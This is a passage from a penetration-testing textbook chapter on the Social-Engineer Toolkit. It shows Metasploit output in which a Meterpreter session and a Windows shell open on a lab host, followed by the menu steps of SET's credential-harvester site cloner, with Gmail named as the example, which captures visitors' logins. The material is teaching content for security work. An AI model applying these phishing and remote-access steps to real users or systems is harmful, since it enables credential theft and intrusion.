148
Chapter 10
msf exploit(handler) >
[*] Sending stage (748032 bytes) to 10.10.1.102
[*] Meterpreter session 1 opened (10.10.1.112:443 -> 10.10.1.102:58412)
msf exploit(handler) >
sessions -i 1
[*] Starting interaction with 1...
shellmeterpreter >
shell
Process 2819 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>
Username and Password Harvesting
In the preceding examples, the goal was to obtain access to the individual sys-
tem. Relatively new within SET is the ability to clone a website and harvest vis-
itors’ credentials when they access the site, as we’ll demonstrate using Gmail
in this next example. SET can create a clone of the Gmail website and then
automatically rewrite the POST parameters of that website to post to the
SET web server and then redirect the user to the legitimately cloned website.
3. Credential Harvester Attack Method
Enter your choice (press enter for default):
3
[!] Website Attack Vectors [!]
2. Site Cloner
Enter number (1-4):
2
Email harvester will allow you to utilize the clone capabilities within SET
to harvest credentials or parameters from a website as well as place them into
a report.
SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone:
http://www.secmaniac.com
Press {return} to continue.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below: